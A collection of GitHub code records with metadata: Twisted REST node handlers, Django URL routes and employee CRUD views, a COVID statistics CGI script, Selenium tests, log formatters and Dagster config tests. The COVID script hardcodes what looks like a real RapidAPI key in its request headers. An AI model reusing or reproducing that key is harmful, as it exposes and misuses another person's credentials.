+{"seq_id": "21687114881", "text": "\"\"\"\r\n.. py:module:: environments_handler\r\n :synopsis: rest handler for environments interaction.\r\n\"\"\"\r\nimport logging\r\nfrom twisted.internet import reactor, defer\r\nfrom twisted.web.resource import Resource,NoResource\r\nfrom twisted.web import resource, http\r\nfrom twisted.python import log,failure\r\nfrom twisted.python.log import PythonLoggingObserver\r\nfrom twisted.web.server import NOT_DONE_YET\r\nfrom twisted.internet.task import deferLater\r\n\r\nfrom pollapli.core.interface.rest.handlers.default_rest_handler import DefaultRestHandler\r\nfrom pollapli.core.interface.rest.request_parser import RequestParser\r\nfrom pollapli.core.interface.rest.response_generator import ResponseGenerator\r\nfrom pollapli.core.interface.rest.handlers.driver_handlers import DriverHandler\r\n\r\nclass NodesHandler(DefaultRestHandler):\r\n \"\"\"\r\n Resource in charge of handling the nodes (plural) so :\r\n Adding a new node\r\n Listing all nodes\r\n etc\r\n \"\"\"\r\n isLeaf=False\r\n def __init__(self,rootUri=\"\",environmentManager=None,envId=None):\r\n DefaultRestHandler.__init__(self,rootUri)\r\n self.environmentManager=environmentManager\r\n \r\n self.envId=envId\r\n self.valid_contentTypes.append(\"application/pollapli.nodeList+json\") \r\n self.validGetParams.append('id')\r\n self.validGetParams.append('type')\r\n\r\n \r\n def getChild(self, id, request):\r\n try:\r\n return NodeHandler(self.rootUri+\"/\"+str(id),self.environmentManager,self.envId,int(id)) \r\n except ValueError :\r\n return NoResource()\r\n \r\n \r\n def render_POST(self,request): \r\n \"\"\"\r\n Handler for POST requests of nodes\r\n extract the data from the request body to add a new node\r\n \"\"\" \r\n r=ResponseGenerator(request,status=201,contentType=\"application/pollapli.node+json\",resource=\"node\",rootUri=self.rootUri)\r\n d=RequestParser(request,\"node\",self.valid_contentTypes,self.validGetParams).ValidateAndParseParams() \r\n d.addCallbacks(callback=lambda params:self.environmentManager.get_environment(self.envId).add_node(**params),errback=r._build_response) \r\n d.addBoth(r._build_response)\r\n request._call=reactor.callLater(0,d.callback,None)\r\n return NOT_DONE_YET\r\n \r\n def render_GET(self, request):\r\n \"\"\"\r\n Handler for GET requests of nodes\r\n \"\"\"\r\n r=ResponseGenerator(request,status=200,contentType=\"application/pollapli.nodeList+json\",resource=\"nodes\",rootUri=self.rootUri)\r\n d=RequestParser(request,\"node\",self.valid_contentTypes,self.validGetParams).ValidateAndParseParams() \r\n d.addCallbacks(callback=lambda params:self.environmentManager.get_environment(self.envId).get_nodes(params),errback=r._build_response)\r\n d.addBoth(r._build_response)\r\n request._call=reactor.callLater(0,d.callback,None)\r\n return NOT_DONE_YET\r\n \r\n \r\n def render_DELETE(self,request):\r\n \"\"\" \r\n Handler for DELETE requests of nodes\r\n WARNING !! needs to be used very carefully, with confirmation on the client side, as it deletes ALL\r\n nodes\r\n \"\"\"\r\n print(\"NODE CLEARING\")\r\n r=ResponseGenerator(request,contentType=\"application/pollapli.nodeList+json\",status=200,rootUri=self.rootUri)\r\n d=RequestParser(request,\"node\",self.valid_contentTypes,self.validGetParams).ValidateAndParseParams() \r\n d.addCallbacks(callback=lambda params:self.environmentManager.get_environment(self.envId).clear_nodes() ,errback=r._build_response) \r\n d.addBoth(r._build_response)\r\n request._call=reactor.callLater(0,d.callback,None)\r\n return NOT_DONE_YET \r\n \r\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\" \r\nSingle node rest handler\r\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\r\nclass NodeHandler(DefaultRestHandler):\r\n isLeaf=False\r\n def __init__(self,rootUri=\"\",environmentManager=None,envId=None,nodeId=None):\r\n DefaultRestHandler.__init__(self,rootUri)\r\n self.logger=log.PythonLoggingObserver(\"dobozweb.core.server.rest.nodeHandler\")\r\n self.environmentManager=environmentManager\r\n self.envId=envId \r\n self.nodeId=nodeId\r\n self.valid_contentTypes.append(\"application/pollapli.node+json\") \r\n subPath=self.rootUri+\"/driver\"\r\n self.putChild(\"driver\",DriverHandler(subPath,self.environmentManager,self.envId,self.nodeId) \r\n)\r\n \r\n def render_GET(self, request):\r\n \"\"\"\r\n Handler for GET requests of node\r\n \"\"\" \r\n r=ResponseGenerator(request,status=200,contentType=\"application/pollapli.node+json\",resource=\"node\",rootUri=self.rootUri)\r\n d=RequestParser(request,\"node\",self.valid_contentTypes,self.validGetParams).ValidateAndParseParams()\r\n d.addCallbacks(lambda params:self.environmentManager.get_environment(self.envId).get_node(self.nodeId),errback=r._build_response)\r\n d.addBoth(r._build_response) \r\n request._call=reactor.callLater(0,d.callback,None)\r\n return NOT_DONE_YET\r\n \r\n def render_PUT(self,request):\r\n \"\"\"\r\n Handler for PUT requests of node\r\n \"\"\"\r\n r=ResponseGenerator(request,status=200,contentType=\"application/pollapli.node+json\",resource=\"node\",rootUri=self.rootUri)\r\n d=RequestParser(request,\"node\",self.valid_contentTypes,self.validGetParams).ValidateAndParseParams() \r\n #d.addCallbacks(callback=lambda params:self.environmentManager.get_environment(self.envId).update_node(id=self.nodeId,**params),errback=r._build_response) \r\n d.addCallbacks(callback=lambda params:self.environmentManager.get_environment(self.envId).update_node(**params),errback=r._build_response) \r\n d.addBoth(r._build_response)\r\n request._call=reactor.callLater(0,d.callback,None)\r\n return NOT_DONE_YET\r\n \r\n def render_DELETE(self,request):\r\n \"\"\" \r\n Handler for DELETE requests for the current node\r\n WARNING !! needs to be used very carefully, with confirmation on the client side, as it deletes the\r\n current node completely\r\n \"\"\"\r\n r=ResponseGenerator(request,status=200,rootUri=self.rootUri) \r\n d=RequestParser(request,\"node\",self.valid_contentTypes,self.validGetParams).ValidateAndParseParams() \r\n d.addCallbacks(lambda params:self.environmentManager.get_environment(self.envId).delete_node(self.nodeId),errback=r._build_response) \r\n d.addBoth(r._build_response)\r\n request._call=reactor.callLater(0,d.callback,None)\r\n return NOT_DONE_YET ", "repo_name": "kaosat-dev/Pollapli", "sub_path": "pollapli/core/interface/rest/handlers/node_handlers.py", "file_name": "node_handlers.py", "file_ext": "py", "file_size_in_byte": 6704, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pollapli.core.interface.rest.handlers.default_rest_handler.DefaultRestHandler", "line_number": 19, "usage_type": "name"}, {"api_name": "pollapli.core.interface.rest.handlers.default_rest_handler.DefaultRestHandler.__init__", "line_number": 28, "usage_type": "call"}, {"api_name": "pollapli.core.interface.rest.handlers.default_rest_handler.DefaultRestHandler", "line_number": 28, "usage_type": "name"}, {"api_name": "twisted.web.resource.NoResource", "line_number": 41, "usage_type": "call"}, {"api_name": "pollapli.core.interface.rest.response_generator.ResponseGenerator", "line_number": 49, "usage_type": "call"}, {"api_name": "pollapli.core.interface.rest.request_parser.RequestParser", "line_number": 50, "usage_type": "call"}, {"api_name": "twisted.internet.reactor.callLater", "line_number": 53, "usage_type": "call"}, {"api_name": "twisted.internet.reactor", "line_number": 53, "usage_type": "name"}, {"api_name": "twisted.web.server.NOT_DONE_YET", "line_number": 54, "usage_type": "name"}, {"api_name": "pollapli.core.interface.rest.response_generator.ResponseGenerator", "line_number": 60, "usage_type": "call"}, {"api_name": "pollapli.core.interface.rest.request_parser.RequestParser", "line_number": 61, "usage_type": "call"}, {"api_name": "twisted.internet.reactor.callLater", "line_number": 64, "usage_type": "call"}, {"api_name": "twisted.internet.reactor", "line_number": 64, "usage_type": "name"}, {"api_name": "twisted.web.server.NOT_DONE_YET", "line_number": 65, "usage_type": "name"}, {"api_name": "pollapli.core.interface.rest.response_generator.ResponseGenerator", "line_number": 75, "usage_type": "call"}, {"api_name": "pollapli.core.interface.rest.request_parser.RequestParser", "line_number": 76, "usage_type": "call"}, {"api_name": "twisted.internet.reactor.callLater", "line_number": 79, "usage_type": "call"}, {"api_name": "twisted.internet.reactor", "line_number": 79, "usage_type": "name"}, {"api_name": "twisted.web.server.NOT_DONE_YET", "line_number": 80, "usage_type": "name"}, {"api_name": "pollapli.core.interface.rest.handlers.default_rest_handler.DefaultRestHandler", "line_number": 85, "usage_type": "name"}, {"api_name": "pollapli.core.interface.rest.handlers.default_rest_handler.DefaultRestHandler.__init__", "line_number": 88, "usage_type": "call"}, {"api_name": "pollapli.core.interface.rest.handlers.default_rest_handler.DefaultRestHandler", "line_number": 88, "usage_type": "name"}, {"api_name": "twisted.python.log.PythonLoggingObserver", "line_number": 89, "usage_type": "call"}, {"api_name": "twisted.python.log", "line_number": 89, "usage_type": "name"}, {"api_name": "pollapli.core.interface.rest.handlers.driver_handlers.DriverHandler", "line_number": 95, "usage_type": "call"}, {"api_name": "pollapli.core.interface.rest.response_generator.ResponseGenerator", "line_number": 102, "usage_type": "call"}, {"api_name": "pollapli.core.interface.rest.request_parser.RequestParser", "line_number": 103, "usage_type": "call"}, {"api_name": "twisted.internet.reactor.callLater", "line_number": 106, "usage_type": "call"}, {"api_name": "twisted.internet.reactor", "line_number": 106, "usage_type": "name"}, {"api_name": "twisted.web.server.NOT_DONE_YET", "line_number": 107, "usage_type": "name"}, {"api_name": "pollapli.core.interface.rest.response_generator.ResponseGenerator", "line_number": 113, "usage_type": "call"}, {"api_name": "pollapli.core.interface.rest.request_parser.RequestParser", "line_number": 114, "usage_type": "call"}, {"api_name": "twisted.internet.reactor.callLater", "line_number": 118, "usage_type": "call"}, {"api_name": "twisted.internet.reactor", "line_number": 118, "usage_type": "name"}, {"api_name": "twisted.web.server.NOT_DONE_YET", "line_number": 119, "usage_type": "name"}, {"api_name": "pollapli.core.interface.rest.response_generator.ResponseGenerator", "line_number": 127, "usage_type": "call"}, {"api_name": "pollapli.core.interface.rest.request_parser.RequestParser", "line_number": 128, "usage_type": "call"}, {"api_name": "twisted.internet.reactor.callLater", "line_number": 131, "usage_type": "call"}, {"api_name": "twisted.internet.reactor", "line_number": 131, "usage_type": "name"}, {"api_name": "twisted.web.server.NOT_DONE_YET", "line_number": 132, "usage_type": "name"}]}
+{"seq_id": "13627853316", "text": "from django.urls import path\nfrom .views import points,create,point,edit_place,delete_place,FeedBackView,FeedBackDetailView\n\nurlpatterns = [\n path('', points, name= 'points-list'),\n path('create/', create, name='create-point'),\n path ('/', point, name = 'point'),\n path ('/edit/',edit_place, name = 'edit-place'),\n path ('/delete/',delete_place, name = 'delete-place'),\n path ('feedback/', FeedBackView.as_view(), name= 'feedback' ),\n path ('feedback/', FeedBackDetailView.as_view(), name='feedback-detail')\n\n]", "repo_name": "perizat1234/intourist", "sub_path": "points/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 563, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.urls.path", "line_number": 5, "usage_type": "call"}, {"api_name": "views.points", "line_number": 5, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "views.create", "line_number": 6, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "views.point", "line_number": 7, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "views.edit_place", "line_number": 8, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "views.delete_place", "line_number": 9, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "views.FeedBackView.as_view", "line_number": 10, "usage_type": "call"}, {"api_name": "views.FeedBackView", "line_number": 10, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "views.FeedBackDetailView.as_view", "line_number": 11, "usage_type": "call"}, {"api_name": "views.FeedBackDetailView", "line_number": 11, "usage_type": "name"}]}
+{"seq_id": "17601994800", "text": "#!/bin/env python3\nprint(\"Content-Type: text/html\")\nprint()\n\nimport requests, time, sys, json\n\nurl = \"https://covid-193.p.rapidapi.com/statistics\"\n\nquerystring = {\"country\": \"Myanmar\"}\n\nheaders = {\n 'x-rapidapi-host': \"covid-193.p.rapidapi.com\",\n 'x-rapidapi-key': \"bc48047875mshf4d1668b9910304p1eeff8jsn109f6bb01cc3\"\n }\nrequest = requests.get(url, headers=headers, params=querystring)\nif request.status_code == 200:\n\tresponse = json.loads(request.text)\n\tf = open('home.106a6c241b8797f52e1e77317b96a201.html', 'r').read()\n\tprint(f.format(results=response['results'],country=response['parameters']['country'], cases_total=response['response'][0]['cases']['total'], cases_recovered=response['response'][0]['cases']['recovered'], cases_critical=response['response'][0]['cases']['critical'], cases_new=response['response'][0]['cases']['new'], cases_active=response['response'][0]['cases']['active'],deaths_new=response['response'][0]['deaths']['new'], deaths_total=response['response'][0]['deaths']['total'], date=response['response'][0]['day'], year=time.strftime(\"%Y\")))", "repo_name": "4cc3ssX/4Covid", "sub_path": "covid/index.py", "file_name": "index.py", "file_ext": "py", "file_size_in_byte": 1077, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 15, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 17, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 19, "usage_type": "call"}]}
+{"seq_id": "13020467458", "text": "import pytest\nfrom tests.testbase import *\n\n\nclass TestSuite:\n # * Este es otro ejemplo de Suite usando otro Fixture y con más de un caso de Prueba:\n\n @pytest.fixture\n def precondition(self, setWebDriver: WebDriver):\n global web, get\n web = setWebDriver\n get = Locators(web)\n\n get.page(\"https://www.selenium.dev/selenium/web/web-form.html\")\n title = web.title\n assert title == \"Web form\"\n\n yield\n web.quit()\n\n def test_TC1_FirstExample(self, precondition):\n\n textBox = get.bySelector(\"[name='my-text']\")\n submitButton = get.bySelector(\"[type='submit']\")\n textBox.send_keys(\"Selenium\")\n submitButton.click()\n message = get.byID(\"message\")\n value = message.text\n assert value == \"Received!\"\n\n def test_TC2_SecondExample(self, precondition):\n\n textBox = get.bySelector(\"[name='my-text']\")\n submitButton = get.bySelector(\"[type='submit']\")\n textBox.send_keys(\"UPEX\")\n submitButton.click()\n message = get.byID(\"message\")\n value = message.text\n assert value == \"Received!\"\n\n\nif __name__ == '__main__':\n pytest.main()\n", "repo_name": "upex-galaxy/selenium-python", "sub_path": "tests/how_to/test_tutorial_fixture2.py", "file_name": "test_tutorial_fixture2.py", "file_ext": "py", "file_size_in_byte": 1184, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pytest.fixture", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pytest.main", "line_number": 43, "usage_type": "call"}]}
+{"seq_id": "4706164457", "text": "import logging\nimport sys\nimport time\nfrom datetime import datetime, timezone\n\nimport simplejson as json\nfrom termcolor import colored\n\n\nclass ColorfulFormatter(logging.Formatter):\n converter = time.gmtime\n\n palette = {\n logging.DEBUG: \"blue\",\n logging.INFO: \"white\",\n logging.WARNING: \"cyan\",\n logging.ERROR: \"red\",\n logging.CRITICAL: \"magenta\",\n }\n\n is_tty = sys.stderr.isatty()\n\n def format(self, record):\n s = super().format(record)\n return colored(s, color=self.palette.get(record.levelno)) if self.is_tty else s\n\n\nclass JsonFormatter(logging.Formatter):\n\n converter = time.gmtime\n\n def __init__(self, environment: str, etl_id: str):\n super().__init__()\n self.environment = environment\n self.etl_id = etl_id\n\n def as_utc_iso8601(self, ts) -> str:\n return (\n datetime.fromtimestamp(ts, timezone.utc)\n .isoformat(\"T\", timespec=\"milliseconds\")\n .replace(\"+00:00\", \"Z\")\n )\n\n def format(self, record: logging.LogRecord) -> str:\n \"\"\"Format log record by creating a JSON-format in a string.\"\"\"\n values = {\n \"application_name\": \"arthur-etl\",\n \"environment\": self.environment,\n \"gmtime\": self.as_utc_iso8601(record.created),\n \"etl_id\": self.etl_id,\n \"log_level\": record.levelname,\n \"log_severity\": record.levelno,\n \"logger\": record.name,\n \"message\": record.getMessage(),\n \"process.id\": record.process,\n \"process.name\": record.processName,\n \"source.filename\": record.filename,\n \"source.function\": record.funcName,\n \"source.line_number\": record.lineno,\n \"source.module\": record.module,\n \"source.pathname\": record.pathname,\n \"thread.name\": record.threadName,\n \"timestamp\": int(record.created * 1000.0),\n }\n # Always add metrics if any are present.\n if hasattr(record, \"metrics\"):\n values[\"metrics\"] = record.metrics # type: ignore\n # Always add exception (value) as a field if exception info is present.\n if record.exc_info is not None and isinstance(record.exc_info, tuple):\n values[\"exception.class\"] = record.exc_info[1].__class__.__name__\n values[\"exception.message\"] = str(record.exc_info[1])\n # Always add formatted exception to message if exception info is present.\n if record.exc_text is not None:\n if values[\"message\"] != \"\\n\":\n values[\"message\"] += \"\\n\" # type: ignore\n values[\"message\"] += record.exc_text # type: ignore\n return json.dumps(values, default=str, separators=(\",\", \":\"), sort_keys=True)\n", "repo_name": "harrystech/arthur-redshift-etl", "sub_path": "python/etl/logs/formatter.py", "file_name": "formatter.py", "file_ext": "py", "file_size_in_byte": 2778, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 25, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.Formatter", "line_number": 10, "usage_type": "attribute"}, {"api_name": "time.gmtime", "line_number": 11, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 14, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 15, "usage_type": "attribute"}, {"api_name": "logging.WARNING", "line_number": 16, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 17, "usage_type": "attribute"}, {"api_name": "logging.CRITICAL", "line_number": 18, "usage_type": "attribute"}, {"api_name": "sys.stderr.isatty", "line_number": 21, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 21, "usage_type": "attribute"}, {"api_name": "termcolor.colored", "line_number": 25, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 28, "usage_type": "attribute"}, {"api_name": "time.gmtime", "line_number": 30, "usage_type": "attribute"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 39, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 39, "usage_type": "name"}, {"api_name": "datetime.timezone.utc", "line_number": 39, "usage_type": "attribute"}, {"api_name": "datetime.timezone", "line_number": 39, "usage_type": "name"}, {"api_name": "logging.LogRecord", "line_number": 44, "usage_type": "attribute"}, {"api_name": "simplejson.dumps", "line_number": 77, "usage_type": "call"}]}
+{"seq_id": "38017147195", "text": "from django.shortcuts import redirect, render\nfrom employe.models import Employee\nfrom employe.forms import EmployeeForm\nfrom django.contrib import messages\n\n\n# Create your views here.\n\n\ndef Emp(request):\n if request.method == \"POST\":\n form = EmployeeForm(request.POST)\n if form.is_valid():\n try:\n form.save()\n messages.success(request, \"Successfully Added\")\n return redirect(\"/show\")\n except:\n pass\n else:\n form = EmployeeForm()\n return render(request, 'index.html', {'form': form})\n\n\ndef show(request):\n employee = Employee.objects.all()\n return render(request, 'show.html', {'employee': employee})\n\n\ndef edit(request, id):\n employee = Employee.objects.get(id=id)\n return render(request, 'edit.html', {'employee': employee})\n\n\ndef update(request, id):\n employee = Employee.objects.get(id=id)\n form = EmployeeForm(request.POST, instance=employee)\n if form.is_valid():\n form.save()\n return redirect(\"/show\")\n else:\n form = EmployeeForm()\n return render(request, 'edit.html', {'form': form})\n\n\ndef delete(request, id):\n employee = Employee.objects.get(id=id)\n employee.delete()\n return redirect(\"/show\")\n", "repo_name": "shnt007/HR_Mgmt", "sub_path": "human_resources/employe/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1272, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "employe.forms.EmployeeForm", "line_number": 12, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 16, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 16, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 17, "usage_type": "call"}, {"api_name": "employe.forms.EmployeeForm", "line_number": 21, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 22, "usage_type": "call"}, {"api_name": "employe.models.Employee.objects.all", "line_number": 26, "usage_type": "call"}, {"api_name": "employe.models.Employee.objects", "line_number": 26, "usage_type": "attribute"}, {"api_name": "employe.models.Employee", "line_number": 26, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 27, "usage_type": "call"}, {"api_name": "employe.models.Employee.objects.get", "line_number": 31, "usage_type": "call"}, {"api_name": "employe.models.Employee.objects", "line_number": 31, "usage_type": "attribute"}, {"api_name": "employe.models.Employee", "line_number": 31, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 32, "usage_type": "call"}, {"api_name": "employe.models.Employee.objects.get", "line_number": 36, "usage_type": "call"}, {"api_name": "employe.models.Employee.objects", "line_number": 36, "usage_type": "attribute"}, {"api_name": "employe.models.Employee", "line_number": 36, "usage_type": "name"}, {"api_name": "employe.forms.EmployeeForm", "line_number": 37, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 40, "usage_type": "call"}, {"api_name": "employe.forms.EmployeeForm", "line_number": 42, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 43, "usage_type": "call"}, {"api_name": "employe.models.Employee.objects.get", "line_number": 47, "usage_type": "call"}, {"api_name": "employe.models.Employee.objects", "line_number": 47, "usage_type": "attribute"}, {"api_name": "employe.models.Employee", "line_number": 47, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 49, "usage_type": "call"}]}
+{"seq_id": "9889705577", "text": "import os\nimport sys\nfrom typing import TYPE_CHECKING, Dict, List, Optional\n\nfrom dagster import Config, Field, job, op\nfrom dagster._config.field import resolve_to_config_type\nfrom dagster._config.snap import ConfigSchemaSnapshot, snap_from_config_type\nfrom dagster._core.definitions.definitions_class import Definitions\nfrom dagster._core.host_representation import InProcessCodeLocationOrigin\nfrom dagster._core.snap.snap_to_yaml import default_values_yaml_from_type_snap\nfrom dagster._core.types.loadable_target_origin import LoadableTargetOrigin\n\nif TYPE_CHECKING:\n from dagster._core.host_representation.external import ExternalJob\n\n\ndef test_basic_default():\n snap = snap_from_config_type(resolve_to_config_type({\"a\": Field(str, \"foo\")}))\n yaml_str = default_values_yaml_from_type_snap(ConfigSchemaSnapshot({}), snap)\n assert yaml_str == \"a: foo\\n\"\n\n\ndef test_basic_no_nested_fields():\n snap = snap_from_config_type(resolve_to_config_type(str))\n yaml_str = default_values_yaml_from_type_snap(ConfigSchemaSnapshot({}), snap)\n assert yaml_str == \"{}\\n\"\n\n\ndef test_with_spaces():\n snap = snap_from_config_type(resolve_to_config_type({\"a\": Field(str, \"with spaces\")}))\n yaml_str = default_values_yaml_from_type_snap(ConfigSchemaSnapshot({}), snap)\n assert yaml_str == \"a: with spaces\\n\"\n\n\ndef external_repository_for_function(fn):\n return external_repository_for_module(fn.__module__, fn.__name__)\n\n\ndef external_repository_for_module(module_name, attribute=None, repository_name=\"__repository__\"):\n loadable_target_origin = LoadableTargetOrigin(\n executable_path=sys.executable,\n module_name=module_name,\n working_directory=os.getcwd(),\n attribute=attribute,\n )\n\n location = InProcessCodeLocationOrigin(\n loadable_target_origin=loadable_target_origin, location_name=module_name\n ).create_location()\n\n return location.get_repository(repository_name)\n\n\ndef trivial_job_defs():\n @op\n def an_op():\n pass\n\n @job\n def a_job():\n an_op()\n\n return Definitions(jobs=[a_job])\n\n\ndef test_print_root() -> None:\n external_repository = external_repository_for_function(trivial_job_defs)\n external_a_job: ExternalJob = external_repository.get_full_external_job(\"a_job\")\n root_config_key = external_a_job.root_config_key\n assert root_config_key\n root_type = external_a_job.config_schema_snapshot.get_config_snap(root_config_key)\n assert (\n default_values_yaml_from_type_snap(external_a_job.config_schema_snapshot, root_type)\n == \"{}\\n\"\n )\n\n\ndef job_def_with_config():\n class MyOpConfig(Config):\n a_str_with_default: str = \"foo\"\n optional_int: Optional[int] = None\n a_str_no_default: str\n\n @op\n def an_op(config: MyOpConfig):\n pass\n\n @job\n def a_job():\n an_op()\n\n return Definitions(jobs=[a_job])\n\n\ndef test_print_root_op_config() -> None:\n external_repository = external_repository_for_function(job_def_with_config)\n external_a_job: ExternalJob = external_repository.get_full_external_job(\"a_job\")\n root_config_key = external_a_job.root_config_key\n assert root_config_key\n root_type = external_a_job.config_schema_snapshot.get_config_snap(root_config_key)\n assert (\n default_values_yaml_from_type_snap(external_a_job.config_schema_snapshot, root_type)\n == \"\"\"ops:\n an_op:\n config:\n a_str_with_default: foo\n\"\"\"\n )\n\n\ndef job_def_with_complex_config():\n class MyNestedConfig(Config):\n a_default_int: int = 1\n\n class MyOpConfig(Config):\n nested: MyNestedConfig\n my_list: List[Dict[str, int]] = [{\"foo\": 1, \"bar\": 2}]\n\n @op\n def an_op(config: MyOpConfig):\n pass\n\n @job\n def a_job():\n an_op()\n\n return Definitions(jobs=[a_job])\n\n\ndef test_print_root_complex_op_config() -> None:\n external_repository = external_repository_for_function(job_def_with_complex_config)\n external_a_job: ExternalJob = external_repository.get_full_external_job(\"a_job\")\n root_config_key = external_a_job.root_config_key\n assert root_config_key\n root_type = external_a_job.config_schema_snapshot.get_config_snap(root_config_key)\n assert (\n default_values_yaml_from_type_snap(external_a_job.config_schema_snapshot, root_type)\n == \"\"\"ops:\n an_op:\n config:\n my_list:\n - bar: 2\n foo: 1\n nested:\n a_default_int: 1\n\"\"\"\n )\n", "repo_name": "dagster-io/dagster", "sub_path": "python_modules/dagster/dagster_tests/core_tests/snap_tests/test_snap_to_yaml.py", "file_name": "test_snap_to_yaml.py", "file_ext": "py", "file_size_in_byte": 4440, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8986, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.TYPE_CHECKING", "line_number": 13, "usage_type": "name"}, {"api_name": "dagster._config.snap.snap_from_config_type", "line_number": 18, "usage_type": "call"}, {"api_name": "dagster._config.field.resolve_to_config_type", "line_number": 18, "usage_type": "call"}, {"api_name": "dagster.Field", "line_number": 18, "usage_type": "call"}, {"api_name": "dagster._core.snap.snap_to_yaml.default_values_yaml_from_type_snap", "line_number": 19, "usage_type": "call"}, {"api_name": "dagster._config.snap.ConfigSchemaSnapshot", "line_number": 19, "usage_type": "call"}, {"api_name": "dagster._config.snap.snap_from_config_type", "line_number": 24, "usage_type": "call"}, {"api_name": "dagster._config.field.resolve_to_config_type", "line_number": 24, "usage_type": "call"}, {"api_name": "dagster._core.snap.snap_to_yaml.default_values_yaml_from_type_snap", "line_number": 25, "usage_type": "call"}, {"api_name": "dagster._config.snap.ConfigSchemaSnapshot", "line_number": 25, "usage_type": "call"}, {"api_name": "dagster._config.snap.snap_from_config_type", "line_number": 30, "usage_type": "call"}, {"api_name": "dagster._config.field.resolve_to_config_type", "line_number": 30, "usage_type": "call"}, {"api_name": "dagster.Field", "line_number": 30, "usage_type": "call"}, {"api_name": "dagster._core.snap.snap_to_yaml.default_values_yaml_from_type_snap", "line_number": 31, "usage_type": "call"}, {"api_name": "dagster._config.snap.ConfigSchemaSnapshot", "line_number": 31, "usage_type": "call"}, {"api_name": "dagster._core.types.loadable_target_origin.LoadableTargetOrigin", "line_number": 40, "usage_type": "call"}, {"api_name": "sys.executable", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 43, "usage_type": "call"}, {"api_name": "dagster._core.host_representation.InProcessCodeLocationOrigin", "line_number": 47, "usage_type": "call"}, {"api_name": "dagster.op", "line_number": 55, "usage_type": "name"}, {"api_name": "dagster.job", "line_number": 59, "usage_type": "name"}, {"api_name": "dagster._core.definitions.definitions_class.Definitions", "line_number": 63, "usage_type": "call"}, {"api_name": "dagster._core.host_representation.external.ExternalJob", "line_number": 68, "usage_type": "name"}, {"api_name": "dagster._core.snap.snap_to_yaml.default_values_yaml_from_type_snap", "line_number": 73, "usage_type": "call"}, {"api_name": "dagster.Config", "line_number": 79, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 81, "usage_type": "name"}, {"api_name": "dagster.op", "line_number": 84, "usage_type": "name"}, {"api_name": "dagster.job", "line_number": 88, "usage_type": "name"}, {"api_name": "dagster._core.definitions.definitions_class.Definitions", "line_number": 92, "usage_type": "call"}, {"api_name": "dagster._core.host_representation.external.ExternalJob", "line_number": 97, "usage_type": "name"}, {"api_name": "dagster._core.snap.snap_to_yaml.default_values_yaml_from_type_snap", "line_number": 102, "usage_type": "call"}, {"api_name": "dagster.Config", "line_number": 112, "usage_type": "name"}, {"api_name": "dagster.Config", "line_number": 115, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 117, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 117, "usage_type": "name"}, {"api_name": "dagster.op", "line_number": 119, "usage_type": "name"}, {"api_name": "dagster.job", "line_number": 123, "usage_type": "name"}, {"api_name": "dagster._core.definitions.definitions_class.Definitions", "line_number": 127, "usage_type": "call"}, {"api_name": "dagster._core.host_representation.external.ExternalJob", "line_number": 132, "usage_type": "name"}, {"api_name": "dagster._core.snap.snap_to_yaml.default_values_yaml_from_type_snap", "line_number": 137, "usage_type": "call"}]}
